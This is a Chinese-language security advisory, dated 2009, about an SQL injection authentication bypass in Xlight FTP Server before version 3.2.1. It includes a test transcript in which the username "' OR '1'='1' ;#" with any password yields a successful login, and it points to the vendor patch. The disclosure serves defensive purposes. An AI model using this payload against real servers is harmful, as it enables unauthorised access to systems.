发布日期：2009-03-19
更新日期：2009-03-31

受影响系统：

XLight FTP Server XLight FTP Server < 3.2.1

不受影响系统：

XLight FTP Server XLight FTP Server 3.2.1

描述：

---

BUGTRAQ  ID: 34288

Xlight FTP Server是Windows平台下的一款高性能FTP服务器软件。

在执行ODBC认证过程中Xlight FTP Server没有正确地过滤用户所提交的用户名和口令字段，远程攻击者可以用“OR '1'='1' ;#”替换用户名绕过认证登录到服务器。

<*来源：fla
  
  链接：http://secunia.com/advisories/34513/
        http://www.xlightftpd.com/forum/viewtopic.php?t=1042
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Connected to server-4.
220 Xlight FTP Server 3.2 ready...
User (server-4:(none)) : ' OR '1'='1' ;#
331 Password required for ' OR '1'='1' ;#
Password : type anything
230 Login OK
ftp>

建议：

---

厂商补丁：

XLight FTP Server
-----------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.xlightftpd.com/whatsnew.htm

浏览次数：3756
严重程度：0（网友投票）